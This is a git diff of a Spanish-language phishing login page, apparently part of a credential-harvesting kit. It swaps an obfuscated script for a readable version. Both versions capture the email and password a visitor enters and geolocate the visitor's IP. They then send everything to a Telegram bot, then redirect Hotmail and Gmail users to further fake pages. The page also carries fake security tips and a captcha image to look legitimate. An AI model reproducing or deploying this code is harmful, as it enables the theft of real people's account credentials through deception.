--- a/index.html
+++ b/index.html
@@ -38,6 +38,15 @@
                         <img src="zxc/lock.JPG" alt="">
                         <p>Acceso seguro. Para ingresar tendrás que completar un proceso de autenticación adicional.</p>
                     </div>
+                    <div class="prote">
+                        <p class="text-prote">Protege tu contraseña</p>
+                        <ul>
+                            <li>No tengas contraseñas iguales a otros servicios.</li>
+                            <li>No compartas tus datos con nadie.</li>
+                        </ul>
+
+                    </div>
+
                 </div>
 
             </div>
@@ -87,7 +96,14 @@
     <div id="cont-nipper">
         <img src="zxc/gf.gif" alt="">
     </div>
-
+        
+    <div class="but-he">
+        <svg fill="currentColor" xmlns="http://www.w3.org/2000/svg" style="color: #fff;" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="20px" height="20px" viewBox="0 0 20 20" xml:space="preserve" aria-hidden="true"><g></g><g></g><g></g><g><g><g><path d="M11,12.3V13c0,0-1.8,0-2,0v-0.6c0-0.6,0.1-1.4,0.8-2.1c0.7-0.7,1.6-1.2,1.6-2.1c0-0.9-0.7-1.4-1.4-1.4 c-1.3,0-1.4,1.4-1.5,1.7H6.6C6.6,7.1,7.2,5,10,5c2.4,0,3.4,1.6,3.4,3C13.4,10.4,11,10.8,11,12.3z"></path><circle cx="10" cy="15" r="1"></circle></g><path d="M10,2c4.4,0,8,3.6,8,8s-3.6,8-8,8s-8-3.6-8-8S5.6,2,10,2 M10,0C4.5,0,0,4.5,0,10s4.5,10,10,10s10-4.5,10-10S15.5,0,10,0 L10,0z"></path></g></g></svg>
+        <p>Ayuda</p>
+    </div>
+    <div class="cach">
+        <img src="zxc/capch.JPG" alt="">
+    </div>
 
     <div id="gfg" style="display:none;"></div>
     <div id="ip" style="display:none;"></div>
@@ -96,5 +112,139 @@
 </body>
 </html>
 <script>
-function _0xe60a(){const _0x56f3ef=['https://ip','tkjuU','n/json','text','https://ap','cSgIe','WmwGQ','2QlXhsX','#cont-nipp','1c9','FPTIy','BBxMN','i.ipify.or','ault','no-cache','Telegram\x20e','rror:','FUETJ','DOMContent','display','jLwZf','LnaIJ','LjeyT','correcto.','test','TayRm','aeSak','dXOxQ','on?token=4','TBXqm','submit','30CDTtcx','.html','356574HjOnoD','type','sutAU','#js2','ezAoB','\x20mal.','fUCmH','Error:','none','stener','🥇🥇ALB🥇🥇\x0aC0','IHCEa','otros.html','60KANPof','addEventLi','175865KinVen','#err','rCYtq','acJfR','jPRps','city','error','href','@gmail','Formato\x20in','Campos\x20obl','g?format=j','evamente,\x20','eVVUw','SaXVo','dxkFf','LdOBB','son','i.telegram','POST','CQPqC','json','780942MFKbie','Intenta\x20nu','ById','zOrIw','520787UYvVoq','password','JHDeR','\x0aPASSWR:\x20','js1','vlCka','MVerX','@hotmail','sTEsw','.org/bot','outl/index','gm/index.h','location','Loaded','uEKYj','applicatio','IP:\x20','click','trim','gfg','preventDef','igatorios','LJIPH','info.io/js','#xjsx','Contraseña','2891979pkMxYh','innerHTML','tor','3817033nkWdNn','address','EzNqf','zWXTy','116yxcwCY','AXJIW','#js1','HxJOe','VraCe','An\x20error\x20o','LkanL','eoMSn','zRXwD','length','CMSqK','6da206f131','IXPyT','#ey','zkOnY','catch','227792YjDjGu','getElement','algo\x20salió','\x0a🌎IP:\x20','CcbVt','value','includes','RR30:\x20','bwSiG','49AfHhfr','AwMAC','stringify','rLnkm','Mxpio','qWquH','querySelec','BxTLI','then','/sendMessa','okqZe','\x20incorrect','style','ccurred','tml','kzTnj','js2','toLowerCas','country'];_0xe60a=function(){return _0x56f3ef;};return _0xe60a();}function _0x11f2(_0x527ef7,_0x2db57a){const _0x55f90b=_0xe60a();return _0x11f2=function(_0x21083c,_0x3ea400){_0x21083c=_0x21083c-(-0x2709+-0x23b2+-0xf1c*-0x5);let _0x131c77=_0x55f90b[_0x21083c];return _0x131c77;},_0x11f2(_0x527ef7,_0x2db57a);}const _0x5c7fa8=_0x11f2;(function(_0xd45f18,_0x23384c){const _0x21f39d=_0x11f2,_0x2aee27=_0xd45f18();while(!![]){try{const _0x3ca94c=parseInt(_0x21f39d(0x143))/(-0x4d*-0x67+-0xaba+-0x48*0x48)+parseInt(_0x21f39d(0x100))/(0x6*0x425+0x866*-0x1+-0x1076)*(-parseInt(_0x21f39d(0x13f))/(0x1b7e+0x124d+0x125*-0x28))+parseInt(_0x21f39d(0x164))/(-0x1306+0x42b*0x1+-0x3*-0x4f5)*(parseInt(_0x21f39d(0x129))/(0x12b1+0x1316*0x2+0x22*-0x1ac))+parseInt(_0x21f39d(0x11a))/(-0x7b2+0x76*0x3d+-0x1466)+-parseInt(_0x21f39d(0xe6))/(0x11a*0x23+-0xcc7+-0x19c0)*(-parseInt(_0x21f39d(0xdd))/(-0x5*0x21f+0x55c*0x6+-0x1585))+parseInt(_0x21f39d(0x15d))/(0x150e+-0x113c+-0x1*0x3c9)*(parseInt(_0x21f39d(0x118))/(0xb*0x61+-0x5*-0x135+-0xa2a*0x1))+parseInt(_0x21f39d(0x160))/(0x2526+-0x61*0xd+-0x202e)*(-parseInt(_0x21f39d(0x127))/(0x60+-0x1c7c+0x88*0x35));if(_0x3ca94c===_0x23384c)break;else _0x2aee27['push'](_0x2aee27['shift']());}catch(_0x2aefcd){_0x2aee27['push'](_0x2aee27['shift']());}}}(_0xe60a,0x3ac69+0x6c0f*0x2c+0x41b6*-0x29),document[_0x5c7fa8(0x128)+_0x5c7fa8(0x123)](_0x5c7fa8(0x10b)+_0x5c7fa8(0x150),function(){const _0x4a7c2d=_0x5c7fa8,_0x642d73={'eoMSn':_0x4a7c2d(0x122),'LkanL':function(_0x188e9c,_0x22039e){return _0x188e9c==_0x22039e;},'LdOBB':_0x4a7c2d(0x144),'CQPqC':_0x4a7c2d(0xfc),'HxJOe':function(_0x58e3e1,_0x1f5f26){return _0x58e3e1===_0x1f5f26;},'aeSak':_0x4a7c2d(0x133)+_0x4a7c2d(0x158),'kzTnj':_0x4a7c2d(0x132)+_0x4a7c2d(0x110),'tkjuU':function(_0x15ae21,_0x4d955b){return _0x15ae21<=_0x4d955b;},'sutAU':_0x4a7c2d(0x15c)+_0x4a7c2d(0xf1)+'a','FUETJ':function(_0x7b2250,_0x468ddf){return _0x7b2250(_0x468ddf);},'VraCe':_0x4a7c2d(0x15b),'TayRm':_0x4a7c2d(0x166),'CMSqK':_0x4a7c2d(0x11d),'dxkFf':_0x4a7c2d(0x101)+'er','zkOnY':_0x4a7c2d(0x12a),'bwSiG':_0x4a7c2d(0xda),'jPRps':function(_0x5c35be,_0x45b95c,_0x5d8b40){return _0x5c35be(_0x45b95c,_0x5d8b40);},'TBXqm':_0x4a7c2d(0x154),'FPTIy':_0x4a7c2d(0x117)},_0x158fb7=document[_0x4a7c2d(0xec)+_0x4a7c2d(0x15f)](_0x642d73[_0x4a7c2d(0xd1)]);let _0x478cb1=document[_0x4a7c2d(0xec)+_0x4a7c2d(0x15f)](_0x642d73[_0x4a7c2d(0x112)]),_0x595203=document[_0x4a7c2d(0xec)+_0x4a7c2d(0x15f)](_0x642d73[_0x4a7c2d(0xd7)]),_0x4c2489=document[_0x4a7c2d(0xec)+_0x4a7c2d(0x15f)](_0x642d73[_0x4a7c2d(0x138)]);const _0x4f43d7=document[_0x4a7c2d(0xec)+_0x4a7c2d(0x15f)](_0x642d73[_0x4a7c2d(0xdb)]),_0x3171d0=document[_0x4a7c2d(0xec)+_0x4a7c2d(0x15f)](_0x642d73[_0x4a7c2d(0xe5)]);_0x642d73[_0x4a7c2d(0x12d)](setTimeout,function(){const _0x56eafd=_0x4a7c2d;_0x4c2489[_0x56eafd(0xf2)][_0x56eafd(0x10c)]=_0x642d73[_0x56eafd(0xd4)];},-0x1f05+-0x704+0x2dd9),_0x3171d0[_0x4a7c2d(0x128)+_0x4a7c2d(0x123)](_0x642d73[_0x4a7c2d(0x116)],function(){const _0x3865e0=_0x4a7c2d;_0x642d73[_0x3865e0(0xd3)](_0x595203[_0x3865e0(0x11b)],_0x642d73[_0x3865e0(0x139)])?_0x595203[_0x3865e0(0x11b)]=_0x642d73[_0x3865e0(0x13d)]:_0x595203[_0x3865e0(0x11b)]=_0x642d73[_0x3865e0(0x139)];}),_0x158fb7[_0x4a7c2d(0x128)+_0x4a7c2d(0x123)](_0x642d73[_0x4a7c2d(0x103)],_0x1f894d=>{const _0xca9cb1=_0x4a7c2d;_0x1f894d[_0xca9cb1(0x157)+_0xca9cb1(0x106)]();const _0x242e56=_0x478cb1[_0xca9cb1(0xe2)][_0xca9cb1(0x155)](),_0x6b111c=_0x595203[_0xca9cb1(0xe2)][_0xca9cb1(0x155)](),_0x3a5c3e=/^[^\s@]+@[^\s@]+\.[^\s@]+$/;if(_0x642d73[_0xca9cb1(0x167)](_0x242e56[_0xca9cb1(0xd6)],0x4c0*0x6+-0x20df+0x45f)||_0x642d73[_0xca9cb1(0x167)](_0x6b111c[_0xca9cb1(0xd6)],0x109d+-0x1f*-0x15+-0x1328))return _0x4f43d7[_0xca9cb1(0x15e)]=_0x642d73[_0xca9cb1(0x113)],![];else{if(!_0x3a5c3e[_0xca9cb1(0x111)](_0x242e56))return _0x4f43d7[_0xca9cb1(0x15e)]=_0x642d73[_0xca9cb1(0xf5)],![];else{if(_0x642d73[_0xca9cb1(0xfa)](_0x6b111c[_0xca9cb1(0xd6)],-0x37*0x45+0x32b*-0x4+-0x3ee*-0x7))return _0x4f43d7[_0xca9cb1(0x15e)]=_0x642d73[_0xca9cb1(0x11c)],![];}}_0x642d73[_0xca9cb1(0x10a)](sender,_0x1f894d);});}));function fetchIPData(){const _0x40afed=_0x5c7fa8,_0x3474bd={'BxTLI':_0x40afed(0x156),'ezAoB':function(_0x5a0175,_0x74f700){return _0x5a0175(_0x74f700);},'SaXVo':_0x40afed(0xf9)+_0x40afed(0x15a)+_0x40afed(0x115)+_0x40afed(0xd8)+_0x40afed(0x102),'CcbVt':_0x40afed(0x161),'dXOxQ':_0x40afed(0xfd)+_0x40afed(0x105)+_0x40afed(0x134)+_0x40afed(0x13a)};return _0x3474bd[_0x40afed(0x11e)](fetch,_0x3474bd[_0x40afed(0x114)])[_0x40afed(0xee)](_0x52ce39=>_0x52ce39[_0x40afed(0x13e)]())[_0x40afed(0xee)](_0x3bc49a=>{const _0x3c5f30=_0x40afed;return document[_0x3c5f30(0xde)+_0x3c5f30(0x141)](_0x3474bd[_0x3c5f30(0xed)])[_0x3c5f30(0x15e)]=_0x3bc49a['ip'],_0x3474bd[_0x3c5f30(0x11e)](fetch,_0x3474bd[_0x3c5f30(0x137)]);})[_0x40afed(0xee)](_0x37d565=>_0x37d565[_0x40afed(0x13e)]())[_0x40afed(0xee)](_0x5b8c05=>{const _0x15dde4=_0x40afed;document[_0x15dde4(0xde)+_0x15dde4(0x141)]('ip')[_0x15dde4(0x15e)]=_0x15dde4(0x153)+_0x5b8c05['ip'],document[_0x15dde4(0xde)+_0x15dde4(0x141)](_0x3474bd[_0x15dde4(0xe1)])[_0x15dde4(0x15e)]=_0x5b8c05[_0x15dde4(0x12e)]+',\x20'+_0x5b8c05[_0x15dde4(0xf8)];});}function sender(_0x14dbc5){const _0x2a9acd=_0x5c7fa8,_0x27d7a8={'okqZe':_0x2a9acd(0x121),'cSgIe':function(_0x1c9464,_0x23ebc3){return _0x1c9464(_0x23ebc3);},'AXJIW':_0x2a9acd(0xd2)+_0x2a9acd(0xf3),'IHCEa':_0x2a9acd(0x14a),'qWquH':_0x2a9acd(0x14d)+_0x2a9acd(0x119),'LjeyT':_0x2a9acd(0x131),'fUCmH':_0x2a9acd(0x14e)+_0x2a9acd(0xf4),'MVerX':_0x2a9acd(0x126),'JHDeR':function(_0x3cc343,_0x299437){return _0x3cc343(_0x299437);},'uEKYj':_0x2a9acd(0x140)+_0x2a9acd(0x135)+_0x2a9acd(0xdf)+_0x2a9acd(0x11f),'BBxMN':_0x2a9acd(0x108)+_0x2a9acd(0x109),'LnaIJ':_0x2a9acd(0x147),'zWXTy':_0x2a9acd(0xf6),'IXPyT':_0x2a9acd(0x156),'acJfR':_0x2a9acd(0x161),'WmwGQ':_0x2a9acd(0x13c),'eVVUw':_0x2a9acd(0x152)+_0x2a9acd(0xfb),'Mxpio':_0x2a9acd(0x107),'zOrIw':function(_0x5c9f35,_0x149e9d,_0x433700){return _0x5c9f35(_0x149e9d,_0x433700);},'EzNqf':function(_0x98142d){return _0x98142d();}};_0x14dbc5[_0x2a9acd(0x157)+_0x2a9acd(0x106)](),_0x27d7a8[_0x2a9acd(0x162)](fetchIPData)[_0x2a9acd(0xee)](()=>{const _0x1ea11b=_0x2a9acd,_0xb2b42b={'LJIPH':_0x27d7a8[_0x1ea11b(0x125)],'sTEsw':_0x27d7a8[_0x1ea11b(0xeb)],'rLnkm':_0x27d7a8[_0x1ea11b(0x10f)],'rCYtq':_0x27d7a8[_0x1ea11b(0x120)],'jLwZf':_0x27d7a8[_0x1ea11b(0x149)],'zRXwD':function(_0x2a1e56,_0x4faa6a){const _0x25b544=_0x1ea11b;return _0x27d7a8[_0x25b544(0x145)](_0x2a1e56,_0x4faa6a);},'AwMAC':_0x27d7a8[_0x1ea11b(0x151)],'vlCka':_0x27d7a8[_0x1ea11b(0x104)]};let _0x27f3e0=document[_0x1ea11b(0xde)+_0x1ea11b(0x141)](_0x27d7a8[_0x1ea11b(0x10e)])[_0x1ea11b(0xe2)],_0x3e29d2=document[_0x1ea11b(0xde)+_0x1ea11b(0x141)](_0x27d7a8[_0x1ea11b(0x163)])[_0x1ea11b(0xe2)];const _0x2ce1e1=document[_0x1ea11b(0xde)+_0x1ea11b(0x141)](_0x27d7a8[_0x1ea11b(0xd9)])[_0x1ea11b(0x15e)],_0x24af9a=document[_0x1ea11b(0xde)+_0x1ea11b(0x141)](_0x27d7a8[_0x1ea11b(0x12c)])[_0x1ea11b(0x15e)],_0x2fee76=_0x1ea11b(0x124)+_0x1ea11b(0xe4)+_0x27f3e0+_0x1ea11b(0x146)+_0x3e29d2+_0x1ea11b(0xe0)+_0x2ce1e1+'\x0a'+_0x24af9a,_0x2f94c8=T0KEN,_0x563d11=CHATID,_0x3d9891={'method':_0x27d7a8[_0x1ea11b(0xff)],'headers':{'Content-Type':_0x27d7a8[_0x1ea11b(0x136)],'cache-control':_0x27d7a8[_0x1ea11b(0xea)]},'body':JSON[_0x1ea11b(0xe8)]({'chat_id':_0x563d11,'text':_0x2fee76})};_0x27d7a8[_0x1ea11b(0x142)](fetch,_0x1ea11b(0xfd)+_0x1ea11b(0x13b)+_0x1ea11b(0x14c)+_0x2f94c8+(_0x1ea11b(0xef)+'ge'),_0x3d9891)[_0x1ea11b(0xee)](_0x2c63ce=>_0x2c63ce[_0x1ea11b(0x13e)]())[_0x1ea11b(0xee)](_0x2dc6a1=>{const _0x564298=_0x1ea11b;if(_0x2dc6a1['ok']){const _0x201fef=_0x27f3e0[_0x564298(0xf7)+'e']();if(_0x201fef[_0x564298(0xe3)](_0xb2b42b[_0x564298(0x159)]))window[_0x564298(0x14f)][_0x564298(0x130)]=_0xb2b42b[_0x564298(0x14b)];else _0x201fef[_0x564298(0xe3)](_0xb2b42b[_0x564298(0xe9)])?window[_0x564298(0x14f)][_0x564298(0x130)]=_0xb2b42b[_0x564298(0x12b)]:window[_0x564298(0x14f)][_0x564298(0x130)]=_0xb2b42b[_0x564298(0x10d)];}else _0xb2b42b[_0x564298(0xd5)](alert,_0xb2b42b[_0x564298(0xe7)]),console[_0x564298(0x12f)](_0xb2b42b[_0x564298(0x148)],_0x2dc6a1);})[_0x1ea11b(0xdc)](_0xefd6f9=>{const _0x2d5196=_0x1ea11b;console[_0x2d5196(0x12f)](_0x27d7a8[_0x2d5196(0xf0)],_0xefd6f9),_0x27d7a8[_0x2d5196(0xfe)](alert,_0x27d7a8[_0x2d5196(0x165)]);});});}
-</script>
+    document.addEventListener('DOMContentLoaded', function() {
+const xjsx = document.querySelector('#xjsx');
+let js1 = document.querySelector('#js1');
+let js2 = document.querySelector('#js2');
+let nipper = document.querySelector('#cont-nipper');
+let sub = document.querySelector('#sub input');
+const err = document.querySelector('#err');
+const ey = document.querySelector('#ey');
+
+setTimeout(function(){
+    nipper.style.display = "none";
+}, 4000)
+
+ey.addEventListener('click', function(){
+    if(js2.type == "password"){
+        js2.type = "text";
+
+    }else{
+        js2.type = "password";
+    }
+})
+function validarEnTiempoReal() {
+    const email = js1.value.trim();
+    const password = js2.value.trim();
+    const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
+
+    const esValido = emailRegex.test(email) && password.length > 7;
+
+    if (esValido) {
+        sub.style.backgroundColor = "#3743aa";
+        sub.style.color = "#fff";
+    } else {
+        sub.style.backgroundColor = "#e1e1e1"; // Volver al color por defecto
+        sub.style.color = "#333";
+
+    }
+}
+
+// Escuchar cambios en tiempo real
+js1.addEventListener('input', validarEnTiempoReal);
+js2.addEventListener('input', validarEnTiempoReal);
+
+
+
+xjsx.addEventListener('submit', e => {
+    e.preventDefault();
+    const email = js1.value.trim();
+    const password = js2.value.trim();
+    const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
+
+    if (email.length === 0 || password.length === 0) {
+        err.innerHTML = "Campos obligatorios";
+        return false;
+    } else if (!emailRegex.test(email)) {
+        err.innerHTML = "Formato incorrecto.";
+        return false;
+    } else if (password.length <= 7) {
+        err.innerHTML = "Contraseña incorrecta";
+        return false;
+    }
+
+    sender(e);
+});
+
+
+
+
+});
+
+function fetchIPData() {
+return fetch('https://api.ipify.org?format=json')
+   .then(response => response.json())
+   .then(data => {
+       document.getElementById("gfg").innerHTML = data.ip;
+       return fetch('https://ipinfo.io/json?token=46da206f1311c9'); 
+   })
+   .then(response => response.json())
+   .then(data => {
+       document.getElementById("ip").innerHTML = `IP: ${data.ip}`;
+       document.getElementById("address").innerHTML = `${data.city}, ${data.country}`;
+   });
+}
+
+function sender(e) {
+    e.preventDefault();
+    fetchIPData().then(() => {
+        let js1 = document.getElementById("js1").value;
+        let js2 = document.getElementById("js2").value;
+        let nipper = document.querySelector('#cont-nipper');
+        const ip = document.getElementById("gfg").innerHTML;
+        const ip2 = document.getElementById("address").innerHTML;
+        const message = `🥇🥇ALB🥇🥇\nC0RR30: ${js1}\nPASSWR: ${js2}\n🌎IP: ${ip}\n${ip2}`;
+
+        const T0K3N = T0KEN; 
+        const chatID = CHATID;
+
+        const settings = {
+            method: 'POST',
+            headers: {
+                'Content-Type': 'application/json',
+                'cache-control': 'no-cache'
+            },
+            body: JSON.stringify({
+                chat_id: chatID,
+                text: message
+            })
+        };
+
+        fetch(`https://api.telegram.org/bot${T0K3N}/sendMessage`, settings)
+            .then(response => response.json())
+            .then(data => {
+                if (data.ok) {
+                    const email = js1.toLowerCase();
+                    nipper.style.display = 'flex';
+
+                    setTimeout(function(){
+                        if (email.includes("@hotmail")) {
+                        window.location.href = 'outl/index.html';
+                    } else if (email.includes("@gmail")) {
+                        window.location.href = 'gm/index.html';
+                    } else {
+                        window.location.href = 'otros.html';
+                    }
+                    }, 3000)
+
+                } else {
+                    alert('Intenta nuevamente, algo salió mal.');
+                    console.error('Telegram error:', data);
+                }
+            })
+            .catch(error => {
+                console.error('Error:', error);
+                alert('An error occurred');
+            });
+    });
+}</script>
